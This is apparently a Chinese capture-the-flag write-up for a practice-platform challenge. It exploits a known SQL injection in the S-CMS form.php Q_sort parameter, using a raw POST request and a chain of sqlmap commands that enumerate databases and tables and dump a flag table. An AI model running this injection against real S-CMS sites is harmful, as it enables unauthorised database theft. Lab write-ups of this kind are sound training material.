【安鸾渗透实战平台】实战渗透/企业网站

总体思路


  1. 通过title得知网站为s-cms
  2. 搜索引擎搜索s-cms历史漏洞 : 找到sql注入
  3. sqlmap梭哈找到flag

分步演示


1. 查看title,发现为s-cms建站
在这里插入图片描述
2. 查找s-scms历史漏洞,找到 form.php 存在sql注入 | sleep语句成功执行
在这里插入图片描述
3. 在Q_sort=1后加 * ,将数据包保存为1.txt:

POST /form.php?action=query&S_id=0 HTTP/1.1
Host: 106.15.50.112:8035
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=7bd4d643075464524223fc70d32e7a30; authorization=fail; authorization4=1MHwwfHMxMXxzMTA0fHM5NHxzOTV8czk5fHM5Nnx3NHx3OTR8dzk1fHc5Nnx3MTA0fHBjMTM1fHBjMTQ2fHBjMTA0fHBjOTR8cGM5NXxwYzk5fHBjOTZ8d2FwMTM1fHdhcDE0Nnx3YXA5NHx3YXA5NXx3YXA5Nnx3YXAxMDR8; __tins__18885840=%7B%22sid%22%3A%201668687646080%2C%20%22vd%22%3A%2020%2C%20%22expires%22%3A%201668689481280%7D; __51cke__=; __51laig__=20
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

Q_sort=1*

4. sqlmap 跑数据包

sqlmap -r D:sqlmap-txt1.txt --batch

在这里插入图片描述
5. 读库 | 使用联合查询, 速度较快

sqlmap -r D:sqlmap-txt1.txt --tech U --dbs --batch

在这里插入图片描述
6. 查看scms库的所有表

sqlmap -r D:sqlmap-txt1.txt --tech U -D scms --tables --batch

在这里插入图片描述
7. 查看SL_flag表的所有字段

sqlmap -r D:sqlmap-txt1.txt --tech U -D scms -T SL_flag --columns --batch

在这里插入图片描述
8. 读取flag字段内容

sqlmap -r D:sqlmap-txt1.txt --tech U -D scms -T SL_flag -C "flag" --dump --batch

在这里插入图片描述

在这里插入图片描述